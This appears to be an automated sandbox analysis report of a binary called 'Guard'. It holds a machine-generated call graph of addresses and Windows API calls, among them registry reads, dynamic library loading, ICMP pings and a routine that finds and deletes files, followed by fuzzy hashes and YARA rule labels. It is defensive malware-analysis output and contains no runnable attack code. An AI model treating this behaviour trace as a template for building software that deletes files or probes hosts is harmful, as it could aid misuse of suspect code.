100074 a7fe19 61 API calls 2 library calls 99941->100074 100075 a8793a 59 API calls Mailbox 99941->100075 100076 a3343f 99941->100076 100084 a33297 99941->100084 99943 a21319 99942->99943 99947 a21338 _memmove 99942->99947 99946 a40fe6 Mailbox 59 API calls 99943->99946 99944 a40fe6 Mailbox 59 API calls 99945 a2134f 99944->99945 99945->99907 99946->99947 99947->99944 99948->99900 100091 a34b29 99949->100091 99954 a708bb 99957 a34a2f 84 API calls 99954->99957 99955 a349ed LoadLibraryExW 100101 a34ade 99955->100101 99959 a708c2 99957->99959 99961 a34ade 3 API calls 99959->99961 99963 a708ca 99961->99963 99962 a34a14 99962->99963 99964 a34a20 99962->99964 100127 a34ab2 99963->100127 99965 a34a2f 84 API calls 99964->99965 99968 a327af 99965->99968 99968->99911 99968->99912 99970 a708f1 100133 a34a6e 99970->100133 99972 a708fe 99974 a6fd14 99973->99974 99975 a329e7 99973->99975 100065->99915 100067 a34a40 100066->100067 100068 a34a39 100066->100068 100070 a34a60 FreeLibrary 100067->100070 100071 a34a4f 100067->100071 100569 a455c6 100068->100569 100070->100071 100071->99921 100072->99926 100073->99941 100074->99941 100075->99941 100138 a34b77 100091->100138 100094 a34b60 FreeLibrary 100095 a349d4 100094->100095 100098 a4547b 100095->100098 100096 a34b77 2 API calls 100097 a34b50 100096->100097 100097->100094 100097->100095 100142 a45490 100098->100142 100100 a349e1 100100->99954 100100->99955 100223 a34baa 100101->100223 100104 a34baa 2 API calls 100107 a34b03 100104->100107 100105 a34b15 FreeLibrary 100106 a34a05 100105->100106 100108 a348b0 100106->100108 100107->100105 100107->100106 100109 a40fe6 Mailbox 59 API calls 100108->100109 100110 a348c5 100109->100110 100111 a3433f 59 API calls 100110->100111 100112 a348d1 _memmove 100111->100112 100113 a7080a 100112->100113 100114 a3490c 100112->100114 100116 a70817 100113->100116 100232 a89ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100113->100232 100115 a34a6e 69 API calls 100114->100115 100119 a34915 100115->100119 100233 a89f5e 95 API calls 100116->100233 100120 a34ab2 74 API calls 100119->100120 100121 a70859 100119->100121 100126 a349a0 100119->100126 100227 a34a8c 100119->100227 100120->100119 100122 a34a8c 85 API calls 100121->100122 100123 a70890 100122->100123 100125 a34ab2 74 API calls 100123->100125 100125->100126 100126->99962 100128 a34ac4 100127->100128 100131 a70945 100127->100131 100339 a45802 100128->100339 100132 a896c4 GetSystemTimeAsFileTime 100132->99970 100134 a34a7d 100133->100134 100135 a70908 100133->100135 100464 a45e80 100134->100464 100137 a34a85 100137->99972 100139 a34b44 100138->100139 100140 a34b80 LoadLibraryA 100138->100140 100139->100096 100139->100097 100140->100139 100141 a34b91 GetProcAddress 100140->100141 100141->100139 100143 a4549c __alloc_osfhnd 100142->100143 100144 a454af 100143->100144 100147 a454e0 100143->100147 100191 a48d58 58 API calls __getptd_noexit 100144->100191 100146 a454b4 100192 a48fe6 9 API calls __cftof2_l 100146->100192 100161 a50718 100147->100161 100150 a454e5 100151 a454ee 100150->100151 100152 a454fb 100150->100152 100193 a48d58 58 API calls __getptd_noexit 100151->100193 100154 a45525 100152->100154 100155 a45505 100152->100155 100176 a50837 100154->100176 100194 a48d58 58 API calls __getptd_noexit 100155->100194 100156 a454bf __alloc_osfhnd @_EH4_CallFilterFunc@8 100156->100100 100162 a50724 __alloc_osfhnd 100161->100162 100163 a49e3b __lock 58 API calls 100162->100163 100174 a50732 100163->100174 100164 a507a6 100196 a5082e 100164->100196 100165 a507ad 100201 a48a4d 58 API calls 2 library calls 100165->100201 100168 a507b4 100168->100164 100202 a4a05b InitializeCriticalSectionAndSpinCount 100168->100202 100169 a50823 __alloc_osfhnd 100169->100150 100171 a49ec3 __mtinitlocknum 58 API calls 100171->100174 100173 a507da EnterCriticalSection 100173->100164 100174->100164 100174->100165 100174->100171 100199 a46e7d 59 API calls __lock 100174->100199 100200 a46ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100174->100200 100185 a50857 __wopenfile 100176->100185 100177 a50871 100207 a48d58 58 API calls __getptd_noexit 100177->100207 100179 a50a2c 100179->100177 100183 a50a8f 100179->100183 100180 a50876 100208 a48fe6 9 API calls __cftof2_l 100180->100208 100182 a45530 100195 a45552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100182->100195 100204 a587d1 100183->100204 100185->100177 100185->100179 100185->100185 100209 a439fb 60 API calls 2 library calls 100185->100209 100187 a50a25 100187->100179 100210 a439fb 60 API calls 2 library calls 100187->100210 100189 a50a44 100189->100179 100211 a439fb 60 API calls 2 library calls 100189->100211 100191->100146 100192->100156 100193->100156 100194->100156 100195->100156 100203 a49fa5 LeaveCriticalSection 100196->100203 100198 a50835 100198->100169 100199->100174 100200->100174 100201->100168 100202->100173 100203->100198 100212 a57fb5 100204->100212 100206 a587ea 100206->100182 100207->100180 100208->100182 100209->100187 100210->100189 100211->100179 100213 a57fc1 __alloc_osfhnd 100212->100213 100214 a57fd7 100213->100214 100217 a5800d 100213->100217 100215 a48d58 __cftof2_l 58 API calls 100214->100215 100216 a57fdc 100215->100216 100218 a48fe6 __cftof2_l 9 API calls 100216->100218 100219 a5807e __wsopen_nolock 109 API calls 100217->100219 100222 a57fe6 __alloc_osfhnd 100218->100222 100220 a58029 100219->100220 100221 a58052 __wsopen_helper LeaveCriticalSection 100220->100221 100221->100222 100222->100206 100224 a34af7 100223->100224 100225 a34bb3 LoadLibraryA 100223->100225 100224->100104 100224->100107 100225->100224 100226 a34bc4 GetProcAddress 100225->100226 100226->100224 100228 a70923 100227->100228 100229 a34a9b 100227->100229 100234 a45a6d 100229->100234 100231 a34aa9 100231->100119 100232->100116 100233->100119 100237 a45a79 __alloc_osfhnd 100234->100237 100235 a45a8b 100265 a48d58 58 API calls __getptd_noexit 100235->100265 100237->100235 100238 a45ab1 100237->100238 100247 a46e3e 100238->100247 100240 a45a90 100266 a48fe6 9 API calls __cftof2_l 100240->100266 100246 a45a9b __alloc_osfhnd 100246->100231 100248 a46e70 EnterCriticalSection 100247->100248 100249 a46e4e 100247->100249 100252 a45ab7 100248->100252 100249->100248 100250 a46e56 100249->100250 100251 a49e3b __lock 58 API calls 100250->100251 100251->100252 100253 a459de 100252->100253 100254 a459fc 100253->100254 100255 a459ec 100253->100255 100257 a45a12 100254->100257 100268 a45af0 100254->100268 100338 a48d58 58 API calls __getptd_noexit 100255->100338 100297 a44c5d 100257->100297 100265->100240 100266->100246 100342 a4581d 100339->100342 100341 a34ad5 100341->100132 100343 a45829 __alloc_osfhnd 100342->100343 100344 a4586c 100343->100344 100345 a4583f _memset 100343->100345 100346 a45864 __alloc_osfhnd 100343->100346 100347 a46e3e __lock_file 59 API calls 100344->100347 100369 a48d58 58 API calls __getptd_noexit 100345->100369 100346->100341 100348 a45872 100347->100348 100355 a4563d 100348->100355 100351 a45859 100370 a48fe6 9 API calls __cftof2_l 100351->100370 100356 a45673 100355->100356 100358 a45658 _memset 100355->100358 100371 a458a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100356->100371 100357 a45663 100460 a48d58 58 API calls __getptd_noexit 100357->100460 100358->100356 100358->100357 100364 a456b3 100358->100364 100360 a45668 100461 a48fe6 9 API calls __cftof2_l 100360->100461 100363 a457c4 _memset 100463 a48d58 58 API calls __getptd_noexit 100363->100463 100364->100356 100364->100363 100366 a44906 __flswbuf 58 API calls 100364->100366 100372 a5108b 100364->100372 100440 a50dd7 100364->100440 100462 a50ef8 58 API calls 3 library calls 100364->100462 100366->100364 100369->100351 100370->100346 100371->100346 100373 a510c3 100372->100373 100374 a510ac 100372->100374 100376 a517fb 100373->100376 100380 a510fd 100373->100380 100375 a48d24 __free_osfhnd 58 API calls 100374->100375 100377 a510b1 100375->100377 100378 a48d24 __free_osfhnd 58 API calls 100376->100378 100379 a48d58 __cftof2_l 58 API calls 100377->100379 100381 a51800 100378->100381 100420 a510b8 100379->100420 100383 a51105 100380->100383 100389 a5111c 100380->100389 100382 a48d58 __cftof2_l 58 API calls 100381->100382 100384 a51111 100382->100384 100385 a48d24 __free_osfhnd 58 API calls 100383->100385 100387 a48fe6 __cftof2_l 9 API calls 100384->100387 100386 a5110a 100385->100386 100392 a48d58 __cftof2_l 58 API calls 100386->100392 100387->100420 100388 a51131 100390 a48d24 __free_osfhnd 58 API calls 100388->100390 100389->100388 100391 a5114b 100389->100391 100393 a51169 100389->100393 100389->100420 100390->100386 100391->100388 100397 a51156 100391->100397 100392->100384 100394 a48a4d __malloc_crt 58 API calls 100393->100394 100395 a51179 100394->100395 100398 a51181 100395->100398 100399 a5119c 100395->100399 100396 a55e9b __flswbuf 58 API calls 100400 a5126a 100396->100400 100397->100396 100401 a48d58 __cftof2_l 58 API calls 100398->100401 100403 a51af1 __lseeki64_nolock 60 API calls 100399->100403 100402 a512e3 ReadFile 100400->100402 100407 a51280 GetConsoleMode 100400->100407 100403->100397 100420->100364 100441 a50de2 100440->100441 100445 a50df7 100440->100445 100442 a48d58 __cftof2_l 58 API calls 100441->100442 100443 a50de7 100442->100443 100444 a48fe6 __cftof2_l 9 API calls 100443->100444 100452 a50df2 100444->100452 100446 a50e2c 100445->100446 100447 a56214 __getbuf 58 API calls 100445->100447 100445->100452 100448 a44906 __flswbuf 58 API calls 100446->100448 100447->100446 100449 a50e40 100448->100449 100450 a50f77 __read 72 API calls 100449->100450 100451 a50e47 100450->100451 100451->100452 100453 a44906 __flswbuf 58 API calls 100451->100453 100452->100364 100454 a50e6a 100453->100454 100454->100452 100460->100360 100461->100356 100462->100364 100463->100360 100465 a45e8c __alloc_osfhnd 100464->100465 100466 a45eb3 100465->100466 100467 a45e9e 100465->100467 100469 a46e3e __lock_file 59 API calls 100466->100469 100477 a48d58 58 API calls __getptd_noexit 100467->100477 100471 a45eb9 100469->100471 100470 a45ea3 100478 a48fe6 9 API calls __cftof2_l 100470->100478 100473 a45af0 __ftell_nolock 67 API calls 100471->100473 100474 a45ec4 100473->100474 100479 a45ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 100474->100479 100476 a45eae __alloc_osfhnd 100476->100137 100477->100470 100478->100476 100479->100476 100842 a21055 100847 a22a19 100842->100847 100845 a42f70 __cinit 67 API calls 100846 a21064 100845->100846 100848 a31207 59 API calls 100847->100848 100849 a22a87 100848->100849 100855 a21256 100849->100855 100851 a5c3aa 100853 a22b24 100853->100851 100854 a2105a 100853->100854 100858 a213f8 59 API calls 2 library calls 100853->100858 100854->100845 100859 a21284 100855->100859 100858->100853 100860 a21291 100859->100860 100861 a21275 100859->100861 100860->100861 100862 a21298 RegOpenKeyExW 100860->100862 100861->100853 100862->100861 100863 a212b2 RegQueryValueExW 100862->100863 100864 a212d3 100863->100864 100865 a212e8 RegCloseKey 100863->100865 100864->100865 100865->100861 100866 a25ff5 100890 a25ede Mailbox _memmove 100866->100890 100867 a40fe6 59 API calls Mailbox 100867->100890 100868 a26a9b 101080 a2a9de 291 API calls 100868->101080 100870 a253b0 291 API calls 100870->100890 100871 a5eff9 100872 a25190 Mailbox 59 API calls 100871->100872 100877 a5efeb 100872->100877 100873 a5f007 101093 a8a48d 89 API calls 4 library calls 100873->101093 100923 a25569 Mailbox 100877->100923 101092 a76cf1 59 API calls Mailbox 100877->101092 100878 a260e5 100879 a5e137 100878->100879 100884 a263bd Mailbox 100878->100884 100891 a26abc 100878->100891 100900 a26152 Mailbox 100878->100900 100879->100884 101081 a77aad 59 API calls 100879->101081 100881 a31c9c 59 API calls 100881->100890 100882 a40fe6 Mailbox 59 API calls 100887 a263d1 100882->100887 100883 a31a36 59 API calls 100883->100890 100884->100882 100895 a26426 100884->100895 100889 a263de 100887->100889 100887->100891 100892 a26413 100889->100892 100893 a5e172 100889->100893 100890->100867 100890->100868 100890->100870 100890->100871 100890->100873 100890->100878 100890->100881 100890->100883 100890->100891 100890->100923 101079 a2523c 59 API calls 100890->101079 101084 a87f11 59 API calls Mailbox 100890->101084 101085 a9c355 291 API calls Mailbox 100890->101085 101086 a76cf1 59 API calls Mailbox 100890->101086 101091 a8a48d 89 API calls 4 library calls 100891->101091 100892->100895 100927 a25447 Mailbox 100892->100927 101082 a9c87c 85 API calls 2 library calls 100893->101082 101083 a9c9c9 95 API calls Mailbox 100895->101083 100899 a5e19d 100899->100899 100900->100877 100900->100891 100901 a25190 Mailbox 59 API calls 100900->100901 100912 a5e2e9 VariantClear 100900->100912 100900->100923 100932 a9e60c 129 API calls 100900->100932 100936 a342cf CloseHandle 100900->100936 100938 a8413a 100900->100938 100941 a9495b 100900->100941 100950 a9f1b2 100900->100950 100955 a8412a 100900->100955 100958 a2d679 100900->100958 100998 a94b25 100900->100998 101007 a95e1d 100900->101007 101032 a8d6be 100900->101032 101087 a77aad 59 API calls 100900->101087 100901->100900 100902 a5f165 101095 a8a48d 89 API calls 4 library calls 100902->101095 100903 a5e691 101088 a8a48d 89 API calls 4 library calls 100903->101088 100905 a269ff 100905->100902 100905->100903 100907 a269fa 100914 a31c9c 59 API calls 100907->100914 100909 a31c9c 59 API calls 100909->100927 100910 a5e6a0 100911 a40fe6 59 API calls Mailbox 100911->100927 100912->100900 100913 a5ea9a 100917 a31c9c 59 API calls 100913->100917 100914->100923 100917->100923 100918 a31207 59 API calls 100918->100927 100919 a77aad 59 API calls 100919->100927 100920 a5eb67 100920->100923 101089 a77aad 59 API calls 100920->101089 100921 a42f70 67 API calls __cinit 100921->100927 100924 a5ef28 101090 a8a48d 89 API calls 4 library calls 100924->101090 100926 a25a1a 101094 a8a48d 89 API calls 4 library calls 100926->101094 100927->100903 100927->100905 100927->100907 100927->100909 100927->100911 100927->100913 100927->100918 100927->100919 100927->100920 100927->100921 100927->100923 100927->100924 100927->100926 101077 a27e50 291 API calls 2 library calls 100927->101077 101078 a26e30 60 API calls Mailbox 100927->101078 100932->100900 100936->100900 101096 a8494a GetFileAttributesW 100938->101096 100942 a40fe6 Mailbox 59 API calls 100941->100942 100943 a9496c 100942->100943 100944 a3433f 59 API calls 100943->100944 100945 a94976 100944->100945 100946 a24d37 84 API calls 100945->100946 100947 a9498d GetEnvironmentVariableW 100946->100947 101100 a87a51 59 API calls Mailbox 100947->101100 100949 a949aa 100949->100900 100951 a24d37 84 API calls 100950->100951 100952 a9f1cf 100951->100952 100953 a84148 66 API calls 100952->100953 100954 a9f1de 100953->100954 100954->100900 100956 a8494a 3 API calls 100955->100956 100957 a84131 100956->100957 100957->100900 101101 a24f98 100958->101101 100961 a65068 100965 a2d6df 100961->100965 101148 a8fbb7 59 API calls 100961->101148 100963 a40fe6 Mailbox 59 API calls 100964 a2d6aa 100963->100964 100966 a2d6ba 100964->100966 100967 a33df7 60 API calls 100964->100967 100974 a2d6ec 100965->100974 101149 a2502b 59 API calls 100965->101149 100968 a24d37 84 API calls 100966->100968 100967->100966 100970 a2d6c8 100968->100970 100972 a33e47 67 API calls 100970->100972 100971 a650b0 100971->100974 100975 a650b8 100971->100975 100973 a2d6d7 100972->100973 100973->100961 100973->100965 101147 a33f0b CloseHandle 100973->101147 100976 a341d6 2 API calls 100974->100976 101150 a2502b 59 API calls 100975->101150 100979 a2d6f3 100976->100979 100980 a650ca 100979->100980 100981 a2d70d 100979->100981 100983 a40fe6 Mailbox 59 API calls 100980->100983 100982 a31207 59 API calls 100981->100982 100984 a2d715 100982->100984 100985 a650d0 100983->100985 101114 a33bc3 100984->101114 100986 a650e4 100985->100986 100988 a33ea1 2 API calls 100985->100988 100992 a650e8 _memmove 100986->100992 101137 a87c7f 100986->101137 100988->100986 100990 a2d724 100991 a24f3c 59 API calls 100990->100991 100990->100992 100993 a2d738 Mailbox 100991->100993 100994 a2d772 100993->100994 100995 a342cf CloseHandle 100993->100995 100994->100900 100996 a2d766 100995->100996 100996->100994 101146 a33f0b CloseHandle 100996->101146 100999 a24d37 84 API calls 100998->100999 101000 a94b5f 100999->101000 101001 a320e0 94 API calls 101000->101001 101002 a94b6f 101001->101002 101003 a94b94 101002->101003 101004 a253b0 291 API calls 101002->101004 101005 a24f98 59 API calls 101003->101005 101006 a94b98 101003->101006 101004->101003 101005->101006 101006->100900 101008 a95e46 101007->101008 101009 a95e74 WSAStartup 101008->101009 101174 a2502b 59 API calls 101008->101174 101011 a95e9d 101009->101011 101031 a95e88 Mailbox 101009->101031 101013 a340cd 59 API calls 101011->101013 101012 a95e61 101012->101009 101175 a2502b 59 API calls 101012->101175 101014 a95ea6 101013->101014 101016 a24d37 84 API calls 101014->101016 101018 a95eb2 101016->101018 101017 a95e70 101017->101009 101019 a3402a 61 API calls 101018->101019 101020 a95ebf inet_addr gethostbyname 101019->101020 101021 a95edd IcmpCreateFile 101020->101021 101020->101031 101022 a95f01 101021->101022 101021->101031 101023 a40fe6 Mailbox 59 API calls 101022->101023 101024 a95f1a 101023->101024 101025 a3433f 59 API calls 101024->101025 101026 a95f25 101025->101026 101027 a95f55 IcmpSendEcho 101026->101027 101028 a95f34 IcmpSendEcho 101026->101028 101029 a95f6d 101027->101029 101028->101029 101030 a95fd4 IcmpCloseHandle WSACleanup 101029->101030 101030->101031 101031->100900 101033 a8d6dd 101032->101033 101034 a8d6e8 101032->101034 101188 a2502b 59 API calls 101033->101188 101038 a31207 59 API calls 101034->101038 101076 a8d7c2 Mailbox 101034->101076 101036 a40fe6 Mailbox 59 API calls 101037 a8d80b 101036->101037 101039 a8d817 101037->101039 101041 a33df7 60 API calls 101037->101041 101040 a8d70c 101038->101040 101043 a24d37 84 API calls 101039->101043 101042 a31207 59 API calls 101040->101042 101041->101039 101044 a8d715 101042->101044 101045 a8d82f 101043->101045 101046 a24d37 84 API calls 101044->101046 101047 a33e47 67 API calls 101045->101047 101048 a8d721 101046->101048 101049 a8d83e 101047->101049 101050 a40119 59 API calls 101048->101050 101051 a8d842 GetLastError 101049->101051 101052 a8d876 101049->101052 101053 a8d736 101050->101053 101055 a8d85b 101051->101055 101057 a8d8d8 101052->101057 101058 a8d8a1 101052->101058 101054 a317e0 59 API calls 101053->101054 101056 a8d769 101054->101056 101074 a8d7cb Mailbox 101055->101074 101190 a33f0b CloseHandle 101055->101190 101059 a8d793 Mailbox 101056->101059 101064 a8412a 3 API calls 101056->101064 101060 a40fe6 Mailbox 59 API calls 101057->101060 101061 a40fe6 Mailbox 59 API calls 101058->101061 101189 a2502b 59 API calls 101059->101189 101065 a8d8dd 101060->101065 101066 a8d8a6 101061->101066 101067 a8d779 101064->101067 101069 a31207 59 API calls 101065->101069 101065->101074 101068 a8d8b7 101066->101068 101070 a31207 59 API calls 101066->101070 101067->101059 101072 a31a36 59 API calls 101067->101072 101191 a8fc0d 59 API calls 2 library calls 101068->101191 101069->101074 101070->101068 101073 a8d78a 101072->101073 101176 a83f1d 101073->101176 101074->100900 101076->101036 101076->101074 101077->100927 101078->100927 101079->100890 101080->100891 101081->100884 101082->100895 101083->100899 101084->100890 101085->100890 101086->100890 101087->100900 101088->100910 101089->100923 101090->100926 101091->100877 101092->100923 101093->100877 101094->100923 101095->100923 101097 a8413f 101096->101097 101098 a84965 FindFirstFileW 101096->101098 101097->100900 101098->101097 101099 a8497a FindClose 101098->101099 101099->101097 101100->100949 101102 a24fa8 101101->101102 101103 a5dd2b 101101->101103 101108 a40fe6 Mailbox 59 API calls 101102->101108 101104 a5dd3c 101103->101104 101106 a31821 59 API calls 101103->101106 101105 a319e1 59 API calls 101104->101105 101107 a5dd46 101105->101107 101106->101104 101111 a24fd4 101107->101111 101112 a31207 59 API calls 101107->101112 101109 a24fbb 101108->101109 101109->101107 101110 a24fc6 101109->101110 101110->101111 101113 a31a36 59 API calls 101110->101113 101111->100961 101111->100963 101112->101111 101113->101111 101115 a33bf3 101114->101115 101116 a33bce 101114->101116 101117 a319e1 59 API calls 101115->101117 101116->101115 101118 a33bdd 101116->101118 101123 a83751 101117->101123 101119 a33b7b 101118->101119 101122 a33bed 101118->101122 101124 a340cd 59 API calls 101119->101124 101121 a83780 101121->100990 101125 a340cd 59 API calls 101122->101125 101123->101121 101157 a836ed ReadFile SetFilePointerEx 101123->101157 101158 a3153b 59 API calls 2 library calls 101123->101158 101126 a33b8d 101124->101126 101128 a83871 101125->101128 101151 a33b23 101126->101151 101131 a33b23 61 API calls 101128->101131 101132 a8387f 101131->101132 101136 a8388f Mailbox 101132->101136 101159 a313f1 61 API calls Mailbox 101132->101159 101133 a3124d 61 API calls 101135 a33bab Mailbox 101133->101135 101135->100990 101136->100990 101138 a87c8a 101137->101138 101139 a40fe6 Mailbox 59 API calls 101138->101139 101140 a87c91 101139->101140 101141 a87c9d 101140->101141 101142 a87cbe 101140->101142 101143 a40fe6 Mailbox 59 API calls 101141->101143 101144 a40fe6 Mailbox 59 API calls 101142->101144 101145 a87ca6 _memset 101143->101145 101144->101145 101145->100992 101146->100994 101147->100961 101148->100961 101149->100971 101150->100979 101152 a33f20 59 API calls 101151->101152 101155 a33b34 101152->101155 101153 a33b65 101153->101133 101153->101135 101154 a34220 2 API calls 101154->101155 101155->101153 101155->101154 101160 a3408f 101155->101160 101157->101123 101158->101123 101159->101136 101161 a340a3 101160->101161 101162 a70692 101160->101162 101169 a33fce 101161->101169 101164 a31c7e 59 API calls 101162->101164 101166 a7069d 101164->101166 101165 a340af 101165->101155 101167 a40fe6 Mailbox 59 API calls 101166->101167 101168 a706b2 _memmove 101167->101168 101170 a33fe6 101169->101170 101173 a33fdf _memmove 101169->101173 101171 a40fe6 Mailbox 59 API calls 101170->101171 101172 a70622 101170->101172 101171->101173 101172->101172 101173->101165 101174->101012 101175->101017 101177 a3133d 59 API calls 101176->101177 101178 a83f52 GetFileAttributesW 101177->101178 101179 a83f66 GetLastError 101178->101179 101182 a83f7f Mailbox 101178->101182 101180 a83f73 CreateDirectoryW 101179->101180 101181 a83f81 101179->101181 101180->101181 101180->101182 101181->101182 101183 a31981 59 API calls 101181->101183 101182->101059 101184 a83fc3 101183->101184 101185 a83f1d 59 API calls 101184->101185 101186 a83fcc 101185->101186 101186->101182 101187 a83fd0 CreateDirectoryW 101186->101187 101187->101182 101188->101034 101189->101076 101190->101074 101191->101074 100741 a29a88 100744 a286e0 100741->100744 100745 a286fd 100744->100745 100746 a60fad 100745->100746 100747 a60ff8 100745->100747 100772 a28724 100745->100772 100750 a60fb5 100746->100750 100753 a60fc2 100746->100753 100746->100772 100779 a9aad0 291 API calls __cinit 100747->100779 100748 a25278 59 API calls 100748->100772 100777 a9b0e4 291 API calls 100750->100777 100751 a42f70 __cinit 67 API calls 100751->100772 100768 a2898d 100753->100768 100778 a9b58c 291 API calls 3 library calls 100753->100778 100756 a23c30 68 API calls 100756->100772 100757 a61289 100757->100757 100758 a611af 100782 a9ae3b 89 API calls 100758->100782 100759 a23f42 68 API calls 100759->100772 100762 a28a17 100763 a239be 68 API calls 100763->100772 100768->100762 100783 a8a48d 89 API calls 4 library calls 100768->100783 100769 a253b0 291 API calls 100769->100772 100770 a31c9c 59 API calls 100770->100772 100772->100748 100772->100751 100772->100756 100772->100758 100772->100759 100772->100762 100772->100763 100772->100768 100772->100769 100772->100770 100773 a23938 68 API calls 100772->100773 100774 a2855e 291 API calls 100772->100774 100775 a284e2 89 API calls 100772->100775 100776 a2835f 291 API calls 100772->100776 100780 a2523c 59 API calls 100772->100780 100781 a773ab 59 API calls 100772->100781 100773->100772 100774->100772 100775->100772 100776->100772 100777->100753 100778->100768 100779->100772 100780->100772 100781->100772 100782->100768 100783->100757 100784 a29a6c 100787 a2829c 100784->100787 100786 a29a78 100788 a282b4 100787->100788 100789 a28308 100787->100789 100788->100789 100791 a253b0 291 API calls 100788->100791 100790 a28331 100789->100790 100797 a8a48d 89 API calls 4 library calls 100789->100797 100790->100786 100794 a282eb 100791->100794 100793 a60ed8 100793->100793 100794->100790 100796 a2523c 59 API calls 100794->100796 100796->100789 100797->100793 101192 a601f8 101193 a601fa 101192->101193 101196 a84d18 SHGetFolderPathW 101193->101196 101197 a31821 59 API calls 101196->101197 101198 a60203 101197->101198 101199 a2107d 101204 a32fc5 101199->101204 101201 a2108c 101202 a42f70 __cinit 67 API calls 101201->101202 101203 a21096 101202->101203 101205 a32fd5 __write_nolock 101204->101205 101206 a31207 59 API calls 101205->101206 101207 a3308b 101206->101207 101208 a400cf 61 API calls 101207->101208 101209 a33094 101208->101209 101235 a408c1 101209->101235 101212 a31900 59 API calls 101213 a330ad 101212->101213 101214 a34c94 59 API calls 101213->101214 101215 a330bc 101214->101215 101216 a31207 59 API calls 101215->101216 101217 a330c5 101216->101217 101218 a319e1 59 API calls 101217->101218 101219 a330ce RegOpenKeyExW 101218->101219 101220 a701a3 RegQueryValueExW 101219->101220 101225 a330f0 Mailbox 101219->101225 101221 a70235 RegCloseKey 101220->101221 101222 a701c0 101220->101222 101223 a70247 _wcscat Mailbox __NMSG_WRITE 101221->101223 101221->101225 101224 a40fe6 Mailbox 59 API calls 101222->101224 101223->101225 101232 a31a36 59 API calls 101223->101232 101233 a34c94 59 API calls 101223->101233 101234 a31609 59 API calls 101223->101234 101226 a701d9 101224->101226 101225->101201 101227 a3433f 59 API calls 101226->101227 101228 a701e4 RegQueryValueExW 101227->101228 101229 a70201 101228->101229 101231 a7021b 101228->101231 101230 a31821 59 API calls 101229->101230 101230->101231 101231->101221 101232->101223 101233->101223 101234->101223 101236 a51b70 __write_nolock 101235->101236 101237 a408ce GetFullPathNameW 101236->101237 101238 a408f0 101237->101238 101239 a31821 59 API calls 101238->101239 101240 a3309f 101239->101240 101240->101212

                                                                                          Executed Functions

                                                                                          Function 00A84005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1148 a84005-a8404c call a31207 * 3 call a40284 call a84fec 1159 a8405c-a8408d call a40119 FindFirstFileW 1148->1159 1160 a8404e-a84057 call a31900 1148->1160 1164 a840fc-a84103 FindClose 1159->1164 1165 a8408f-a84091 1159->1165 1160->1159 1166 a84107-a84129 call a31cb6 * 3 1164->1166 1165->1164 1167 a84093-a84098 1165->1167 1169 a8409a-a840d5 call a31c9c call a317e0 call a31900 DeleteFileW 1167->1169 1170 a840d7-a840e9 FindNextFileW 1167->1170 1169->1170 1183 a840f3-a840fa FindClose 1169->1183 1170->1165 1171 a840eb-a840f1 1170->1171 1171->1165 1183->1166
                                                                                          APIs
                                                                                            • Part of subcall function 00A40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A32A58,?,00008000), ref: 00A402A4
                                                                                            • Part of subcall function 00A84FEC: GetFileAttributesW.KERNEL32(?,00A83BFE), ref: 00A84FED
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A8407C
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A840CC
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A840DD
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A840F4
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A840FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2649000838-1173974218
                                                                                          • Opcode ID: d636307e8e3330565cb7fb84532eb27cbf5191d6baec9a4bd1d647f7d8fa245c
                                                                                          • Instruction ID: 33d1e1fe7f133cc3d1270c06769414e88d19814c890037f220640aed064ee209
                                                                                          • Opcode Fuzzy Hash: d636307e8e3330565cb7fb84532eb27cbf5191d6baec9a4bd1d647f7d8fa245c
                                                                                          • Instruction Fuzzy Hash: 2B316E310083859BC705FBA4C995DEFB7A8BE95304F444A2DF5E582192EB24DA09DB63
                                                                                          Function 00A8494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,00A6FC86), ref: 00A8495A
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A8496B
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A8497B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
